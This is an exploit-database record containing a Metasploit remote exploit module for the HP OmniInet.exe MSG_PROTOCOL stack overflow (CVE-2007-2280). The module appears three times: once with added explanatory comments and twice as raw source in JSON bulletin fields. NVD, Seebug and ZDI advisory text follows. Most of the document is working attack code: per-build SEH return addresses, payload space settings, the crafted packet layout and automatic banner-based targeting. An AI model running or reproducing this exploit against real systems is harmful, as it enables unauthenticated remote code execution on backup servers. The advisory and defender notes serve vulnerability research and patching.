ID EDB-ID:16455 Type exploitdb Reporter metasploit Modified 2010-09-20T00:00:00
Description
HP OmniInet.exe MSG_PROTOCOL Buffer Overflow (CVE-2007-2280). Remote exploit for the Windows platform.
##
# $Id: hp_omniinet_1.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
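# Metasploit remote exploit module for CVE-2007-2280, a stack-based buffer
# overflow in HP's OmniInet.exe service reached through a MSG_PROTOCOL request.
#
# Notes for defenders, all taken from this module and its listed references:
# * The service is addressed on TCP port 5555 (the default RPORT below).
# * The request built by #exploit is a 4-byte big-endian length, the bytes
#   FF FE, the text "267" passed through Rex::Text.to_unicode, and argument
#   fields separated by 00 00 20 00. One field carries up to 4724 bytes of
#   payload followed by 25,000 bytes of filler, so the request is very large.
# * ZDI-09-099 (see 'References') is the advisory for this issue; patch status,
#   not the banner version alone, decides whether a host is still exposed.
class Metasploit3 < Msf::Exploit::Remote
  # Reliability ranking the module author assigned to this exploit.
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Declares the module metadata (name, references, payload constraints and
  # per-build targets) and registers the default remote port.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow',
      # The %q{} body is kept flush-left so the string stays byte-identical.
      'Description' => %q{
This module exploits a stack-based buffer overflow in the Hewlett-Packard
OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)
packet, a remote attacker may be able to execute arbitrary code with elevated
privileges.
This service is installed with HP OpenView Data Protector, HP Application
Recovery Manager and potentially other products. This exploit has been tested
against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1
of Application Recovery Manager.
NOTE: There are actually two consecutive wcscpy() calls in the program (which
may be why ZDI considered them two separate issues). However, this module only
exploits the first one.
},
      'Author' =>
        [
          'EgiX <n0b0d13s[at]gmail.com>',
          'Fairuzan Roslan <riaf[at]mysec.org>',
          'jduck'
        ],
      'Version' => '$Revision: 10394 $',
      'References' =>
        [
          [ 'CVE', '2007-2280' ],
          [ 'BID', '37396' ],
          [ 'OSVDB', '61206' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-099' ]
        ],
      'Privileged' => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload' =>
        {
          'Space' => 4658+66,
          'BadChars' => "\x00", # (we don't want \x00\x00)
          'StackAdjustment' => -3500
        },
      'Platform' => 'win',
      'Targets' =>
        [
          # Target 0 makes #exploit pick a target from the service banner.
          [ 'Automatic Targeting', { 'auto' => true } ],
          # DP Targets
          # Each target name doubles as the pattern matched against the banner
          # in #exploit, so the strings must stay exactly as the service prints
          # them.
          [ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330',
            {
              'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0)
            }
          ],
          [ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331',
            {
              'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0)
            }
          ],
          # APPRM Targets
          [ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81',
            {
              'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0)
            }
          ],
          [ 'HP Application Recovery Manager software A.06.10: INET, internal build 282',
            {
              'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0)
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Dec 17 2009'))
    register_options([Opt::RPORT(5555)], self.class)
  end

  # Fingerprints the remote service from its banner and classifies it by the
  # version number the banner reports.
  #
  # Sends 64 random upper-case letters, waits up to 5 seconds for a reply and
  # collapses the reply's 16-bit little-endian units to single bytes before
  # matching it against the known product names.
  #
  # @return [Exploit::CheckCode] Vulnerable when the reported version is below
  #   6.11, Safe when it is 6.11 or later or when nothing was received, and
  #   Detected when the product is unknown or no version can be read.
  #
  # NOTE(review): a host that sends no reply is reported Safe; that is absence
  # of evidence, not proof the host is patched.
  # NOTE(review): the result rests on the banner version only. A patched build
  # presumably still reports the same version string, so confirm patch level
  # on the host before treating "Vulnerable" as final.
  def check
    connect
    begin
      sock.put(rand_text_alpha_upper(64))
      resp = sock.get_once(-1, 5)
    ensure
      # Close the socket even when the write or read raises.
      disconnect
    end

    return Exploit::CheckCode::Safe unless resp

    banner = resp.unpack('v*').pack('C*')
    print_status("Received response: " + banner)

    # The version token sits at a different word position per product name.
    token =
      case banner
      when /HP Data Protector/
        banner.split[3]
      when /HP OpenView Storage Data Protector/,
           /HP StorageWorks Application Recovery Manager/
        banner.split[5]
      end

    # Unknown product, or a recognised product whose banner is too short to
    # hold a version token (previously this raised NoMethodError on nil).
    return Exploit::CheckCode::Detected unless token

    # Tokens look like "A.06.00:"; take the two numeric fields after the first
    # dot. A token without a numeric major field is reported as Detected rather
    # than being read as version 0 and flagged Vulnerable by accident.
    m = token.match(/\A[^.]*\.(\d+)(?:\.(\d+))?/)
    return Exploit::CheckCode::Detected unless m

    major = m[1].to_i
    minor = m[2].to_i

    if major < 6 || (major == 6 && minor < 11)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Selects a target (from the banner when 'Automatic Targeting' is chosen),
  # builds one MSG_PROTOCOL request and sends it to the service.
  #
  # @raise [RuntimeError] when automatic targeting gets no banner, or when the
  #   banner matches none of the declared target names
  def exploit
    mytarget = target
    if (target['auto'])
      mytarget = nil
      print_status("Automatically detecting the target...")
      # Same banner probe as #check: 64 random letters, 5 second read timeout.
      connect
      sock.put(rand_text_alpha_upper(64))
      resp = sock.get_once(-1,5)
      disconnect
      if not resp
        raise RuntimeError, "No version response returned."
      end
      resp = resp.unpack('v*').pack('C*')
      print_status("Received response: " + resp)
      # Each target name is interpolated into a regex and matched against the
      # banner; the first match wins.
      self.targets.each do |t|
        if (resp =~ /#{t.name}/) then
          mytarget = t
          break
        end
      end
      if (not mytarget)
        raise RuntimeError, "No matching target"
      end
      print_status("Selected Target: #{mytarget.name}")
    else
      print_status("Trying target #{mytarget.name}...")
    end
    # separator between arguments (the four bytes 00 00 20 00)
    sep = [0x2000].pack('N')
    # Unicode BOM
    pkt = "\xff\xfe"
    # MSG_PROTOCOL command
    pkt << Rex::Text.to_unicode("267")
    # three two-letter fields whose meaning the author left undocumented
    3.times do
      pkt << sep
      pkt << rand_text_alpha_upper(2)
    end
    # culprit string
    pkt << sep
    # the payload + seh record
    pkt << payload.encoded
    pkt << generate_seh_record(mytarget.ret)
    # jump back
    dist = payload_space + 8
    pkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + dist.to_s).encode_string
    # force exception hitting the end of the stack
    # (one 1000-character random string repeated 25 times)
    pkt << rand_text_alphanumeric(1000) * 25
    # 5th arg
    pkt << sep
    pkt << rand_text_alpha_upper(2)
    # end marker
    pkt << sep
    # packet length (32-bit big-endian prefix in front of the body)
    buff = [pkt.length].pack('N')
    buff << pkt
    connect
    print_status("Sending MSG_PROTOCOL packet...")
    sock.put(buff)
    handler
    disconnect
  end
end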
{"id": "EDB-ID:16455", "hash": "50a62fadc4bafa83dbf58b060a83a361", "type": "exploitdb", "bulletinFamily": "exploit", "title": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", "description": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow. CVE-2007-2280. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "modified": "2010-09-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16455/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2007-2280"], "lastseen": "2016-02-01T23:54:32", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 9.9, "vector": "NONE", "modified": "2016-02-01T23:54:32"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2280"]}, {"type": "seebug", "idList": ["SSV:15116"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84905"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22980", "SECURITYVULNS:VULN:10483", "SECURITYVULNS:DOC:22965"]}, {"type": "nessus", "idList": ["HP_DATA_PROTECTOR_MSG_PROTOCOL_BOF.NASL", "HPUX_PHSS_37383.NASL", "HPUX_PHSS_36622.NASL", "HPUX_PHSS_36589.NASL", "HPUX_PHSS_36799.NASL", "HPUX_PHSS_36588.NASL", "HPUX_PHSS_37382.NASL", "HPUX_PHSS_36800.NASL", "HPUX_PHSS_36623.NASL"]}, {"type": "zdi", "idList": ["ZDI-09-099"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_1"]}], "modified": "2016-02-01T23:54:32"}, "vulnersScore": 9.9}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/16455/", "sourceData": "##\r\n# $Id: hp_omniinet_1.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Hewlett-Packard\r\n\t\t\t\tOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\r\n\t\t\t\tpacket, a remote attacker may be able to execute arbitrary code with elevated\r\n\t\t\t\tprivileges.\r\n\r\n\t\t\t\tThis service is installed with HP OpenView Data Protector, HP Application\r\n\t\t\t\tRecovery Manager and potentially other products. This exploit has been tested\r\n\t\t\t\tagainst versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\r\n\t\t\t\tof Application Recovery Manager.\r\n\r\n\t\t\t\tNOTE: There are actually two consecutive wcscpy() calls in the program (which\r\n\t\t\t\tmay be why ZDI considered them two separate issues). 
However, this module only\r\n\t\t\t\texploits the first one.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'EgiX <n0b0d13s[at]gmail.com>',\r\n\t\t\t\t\t'Fairuzan Roslan <riaf[at]mysec.org>',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-2280' ],\r\n\t\t\t\t\t[ 'BID', '37396' ],\r\n\t\t\t\t\t[ 'OSVDB', '61206' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-099' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 4658+66,\r\n\t\t\t\t\t'BadChars' => \"\\x00\", # (we don't want \\x00\\x00)\r\n\t\t\t\t\t'StackAdjustment' => -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic Targeting', { 'auto' => true } ],\r\n\r\n\t\t\t\t\t# DP Targets\r\n\t\t\t\t\t[ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# APPRM Targets\r\n\t\t\t\t\t[ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'HP Application Recovery Manager software A.06.10: INET, internal build 282',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0)\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Dec 17 
2009'))\r\n\r\n\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tsock.put(rand_text_alpha_upper(64))\r\n\t\tresp = sock.get_once(-1,5)\r\n\t\tdisconnect\r\n\r\n\t\tif (resp)\r\n\t\t\tresp = resp.unpack('v*').pack('C*')\r\n\t\t\tprint_status(\"Received response: \" + resp)\r\n\r\n\t\t\t# extract version\r\n\t\t\tif (resp =~ /HP Data Protector/)\r\n\t\t\t\tversion = resp.split[3]\r\n\t\t\telsif (resp =~ /HP OpenView Storage Data Protector/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telsif (resp =~ /HP StorageWorks Application Recovery Manager/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Detected\r\n\t\t\tend\r\n\r\n\t\t\tversion = version.split('.')\r\n\t\t\tmajor = version[1].to_i\r\n\t\t\tminor = version[2].to_i\r\n\t\t\tif ((major < 6) or (major == 6 and minor < 11))\r\n\t\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\t\tend\r\n\r\n\t\t\tif ((major > 6) or (major == 6 and minor >= 11))\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tmytarget = target\r\n\r\n\t\tif (target['auto'])\r\n\t\t\tmytarget = nil\r\n\r\n\t\t\tprint_status(\"Automatically detecting the target...\")\r\n\r\n\t\t\tconnect\r\n\t\t\tsock.put(rand_text_alpha_upper(64))\r\n\t\t\tresp = sock.get_once(-1,5)\r\n\t\t\tdisconnect\r\n\r\n\t\t\tif not resp\r\n\t\t\t\traise RuntimeError, \"No version response returned.\"\r\n\t\t\tend\r\n\r\n\t\t\tresp = resp.unpack('v*').pack('C*')\r\n\t\t\tprint_status(\"Received response: \" + resp)\r\n\r\n\t\t\tself.targets.each do |t|\r\n\t\t\t\tif (resp =~ /#{t.name}/) then\r\n\t\t\t\t\tmytarget = t\r\n\t\t\t\t\tbreak\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\t\tif (not mytarget)\r\n\t\t\t\traise RuntimeError, \"No matching target\"\r\n\t\t\tend\r\n\r\n\t\t\tprint_status(\"Selected Target: #{mytarget.name}\")\r\n\t\telse\r\n\t\t\tprint_status(\"Trying target 
#{mytarget.name}...\")\r\n\t\tend\r\n\r\n\t\t# separator between arguments\r\n\t\tsep = [0x2000].pack('N')\r\n\r\n\t\t# Unicode BOM\r\n\t\tpkt = \"\\xff\\xfe\"\r\n\t\t# MSG_PROTOCOL command\r\n\t\tpkt << Rex::Text.to_unicode(\"267\")\r\n\r\n\t\t# dunno\r\n\t\t3.times do\r\n\t\t\tpkt << sep\r\n\t\t\tpkt << rand_text_alpha_upper(2)\r\n\t\tend\r\n\r\n\t\t# culprit string\r\n\t\tpkt << sep\r\n\r\n\t\t# the payload + seh record\r\n\t\tpkt << payload.encoded\r\n\t\tpkt << generate_seh_record(mytarget.ret)\r\n\r\n\t\t# jump back\r\n\t\tdist = payload_space + 8\r\n\t\tpkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + dist.to_s).encode_string\r\n\r\n\t\t# force exception hitting the end of the stack\r\n\t\tpkt << rand_text_alphanumeric(1000) * 25\r\n\r\n\t\t# 5th arg\r\n\t\tpkt << sep\r\n\t\tpkt << rand_text_alpha_upper(2)\r\n\r\n\t\t# end marker\r\n\t\tpkt << sep\r\n\r\n\t\t# packet length\r\n\t\tbuff = [pkt.length].pack('N')\r\n\t\tbuff << pkt\r\n\r\n\t\tconnect\r\n\t\tprint_status(\"Sending MSG_PROTOCOL packet...\")\r\n\t\tsock.put(buff)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["61206"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in OmniInet.exe (aka the backup client service daemon) in the Application Recovery Manager component in HP OpenView Storage Data Protector 5.50 and 6.0 allows remote attackers to execute arbitrary code via an MSG_PROTOCOL command with long arguments, a different vulnerability than CVE-2009-3844.", "modified": "2009-12-23T06:26:00", "id": "CVE-2007-2280", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2280", "published": "2009-12-18T19:30:00", "title": "CVE-2007-2280", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:05", "bulletinFamily": "exploit", "description": "", "modified": "2010-01-07T00:00:00", "published": "2010-01-07T00:00:00", "href": "https://packetstormsecurity.com/files/84905/HP-OmniInet.exe-MSG_PROTOCOL-Buffer-Overflow.html", "id": "PACKETSTORM:84905", "type": "packetstorm", "title": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", "sourceData": "`## \n# $Id: hp_omniinet_1.rb 8080 2010-01-06 20:09:34Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OmniInet.exe MSG_PROTOCOL Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow in the Hewlett-Packard \nOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b) \npacket, a remote attacker may be able to execute arbitrary code with elevated \nprivileges. 
\n \nThis service is installed with HP OpenView Data Protector, HP Application \nRecovery Manager and potentially other products. This exploit has been tested \nagainst versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1 \nof Application Recovery Manager. \n \nNOTE: There are actually two consecutive wcscpy() calls in the program (which \nmay be why ZDI considered them two separate issues). However, this module only \nexploits the first one. \n}, \n'Author' => \n[ \n'EgiX <n0b0d13s[at]gmail.com>', \n'Fairuzan Roslan <riaf[at]mysec.org>', \n'jduck' \n], \n'Version' => '$Revision: 8080 $', \n'References' => \n[ \n[ 'CVE', '2007-2280' ], \n[ 'BID', '37396' ], \n[ 'OSVDB', '61206' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-099' ] \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 4658+66, \n'BadChars' => \"\\x00\", # (we don't want \\x00\\x00) \n'StackAdjustment' => -3500 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic Targeting', { 'auto' => true } ], \n \n# DP Targets \n[ 'HP OpenView Storage Data Protector A.05.50: INET, internal build 330', \n{ \n'Ret' => 0x004406cf # p/p/r - OmniInet.exe (v5.50.330.0) \n} \n], \n[ 'HP OpenView Storage Data Protector A.06.00: INET, internal build 331', \n{ \n'Ret' => 0x0044327d # p/p/r - OmniInet.exe (v6.0.331.0) \n} \n], \n \n# APPRM Targets \n[ 'HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81', \n{ \n'Ret' => 0x004280ff # p/p/r - OmniInet.exe (v6.0.81.0) \n} \n], \n[ 'HP Application Recovery Manager software A.06.10: INET, internal build 282', \n{ \n'Ret' => 0x004412ed # p/p/r - OmniInet.exe (v6.0.282.0) \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 17 2009')) \n \nregister_options([Opt::RPORT(5555)], self.class) \nend \n \ndef check \nconnect \nsock.put(rand_text_alpha_upper(64)) \nresp = sock.get_once(-1,5) \ndisconnect \n \nif (resp) \nresp = 
resp.unpack('v*').pack('C*') \nprint_status(\"Received response: \" + resp) \n \n# extract version \nif (resp =~ /HP Data Protector/) \nversion = resp.split[3] \nelsif (resp =~ /HP OpenView Storage Data Protector/) \nversion = resp.split[5] \nelsif (resp =~ /HP StorageWorks Application Recovery Manager/) \nversion = resp.split[5] \nelse \nreturn Exploit::CheckCode::Detected \nend \n \nversion = version.split('.') \nmajor = version[1].to_i \nminor = version[2].to_i \nif ((major < 6) or (major == 6 and minor < 11)) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nif ((major > 6) or (major == 6 and minor >= 11)) \nreturn Exploit::CheckCode::Safe \nend \n \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nmytarget = target \n \nif (target['auto']) \nmytarget = nil \n \nprint_status(\"Automatically detecting the target...\") \n \nconnect \nsock.put(rand_text_alpha_upper(64)) \nresp = sock.get_once(-1,5) \ndisconnect \n \nif not resp \nraise RuntimeError, \"No version response returned.\" \nend \n \nresp = resp.unpack('v*').pack('C*') \nprint_status(\"Received response: \" + resp) \n \nself.targets.each do |t| \nif (resp =~ /#{t.name}/) then \nmytarget = t \nbreak \nend \nend \n \nif (not mytarget) \nraise RuntimeError, \"No matching target\" \nend \n \nprint_status(\"Selected Target: #{mytarget.name}\") \nelse \nprint_status(\"Trying target #{mytarget.name}...\") \nend \n \n# separator between arguments \nsep = [0x2000].pack('N') \n \n# Unicode BOM \npkt = \"\\xff\\xfe\" \n# MSG_PROTOCOL command \npkt << Rex::Text.to_unicode(\"267\") \n \n# dunno \n3.times do \npkt << sep \npkt << rand_text_alpha_upper(2) \nend \n \n# culprit string \npkt << sep \n \n# the payload + seh record \npkt << payload.encoded \npkt << generate_seh_record(mytarget.ret) \n \n# jump back \ndist = payload_space + 8 \npkt << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + dist.to_s).encode_string \n \n# force exception hitting the end of the stack \npkt << 
rand_text_alphanumeric(1000) * 25 \n \n# 5th arg \npkt << sep \npkt << rand_text_alpha_upper(2) \n \n# end marker \npkt << sep \n \n# packet length \nbuff = [pkt.length].pack('N') \nbuff << pkt \n \nconnect \nprint_status(\"Sending MSG_PROTOCOL packet...\") \nsock.put(buff) \n \nhandler \ndisconnect \n \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/84905/hp_omniinet_1.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:28:17", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 37396\r\nCVE(CAN) ID: CVE-2007-2280\r\n\r\nHP OpenView Storage Data Protector\u662f\u53ef\u6269\u5c55\u7684\u6570\u636e\u7ba1\u7406\u89e3\u51b3\u65b9\u6848\uff0c\u5b9e\u73b0\u57fa\u4e8e\u78c1\u76d8\u6216\u78c1\u5e26\u7684\u9ad8\u6027\u80fd\u5907\u4efd\u548c\u6062\u590d\u529f\u80fd\u3002\r\n\r\nOpenView Storage Data Protector\u9ed8\u8ba4\u7ed1\u5b9a\u5728TCP 5555\u7aef\u53e3\u4e0a\u7684\u5907\u4efd\u5ba2\u6237\u7aef\u670d\u52a1\u5b88\u62a4\u7a0b\u5e8f\uff08OmniInet.exe\uff09\u5728\u5904\u7406\u53d1\u9001\u7ed9MSG_PROTOCOL\u547d\u4ee4\u7684\u8d85\u957f\u53c2\u6570\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u8bf7\u6c42\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u4ee5\u670d\u52a1\u7684\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nHP OpenView Storage Data Protector 6.0\r\nHP OpenView Storage Data Protector 5.5\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nHP\r\n--\r\nHP\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08HPSBMA02252\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nHPSBMA02252\uff1aSSRT061258, SSRT061259 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Code Execution\r\n\u94fe\u63a5\uff1ahttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817&printver=true", "modified": 
"2009-12-20T00:00:00", "published": "2009-12-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15116", "id": "SSV:15116", "type": "seebug", "title": "HP OpenView Storage Data Protector\u5907\u4efd\u5ba2\u6237\u7aef\u670d\u52a1\u6808\u6ea2\u51fa\u6f0f\u6d1e", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "ZDI-09-099: Hewlett-Packard OpenView Data Protector Backup Client Service Buffer Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-099\r\nDecember 17, 2009\r\n\r\n-- CVE ID:\r\nCVE-2007-2280\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Data Protector\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 4786. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard Storage Data Protector.\r\nAuthentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the backup client service daemon\r\n(OmniInet.exe), which binds to TCP port 5555. During the processing of\r\nlong arguments to the 'MSG_PROTOCOL' command, a stack based buffer\r\noverflow occurs and can result in code execution under the context of\r\nthe daemon.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. 
More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01124817\r\n\r\n-- Disclosure Timeline:\r\n2006-10-10 - Vulnerability reported to vendor\r\n2009-12-17 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Tenable Network Security\r\n * Aaron Portnoy, TippingPoint DVLabs\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
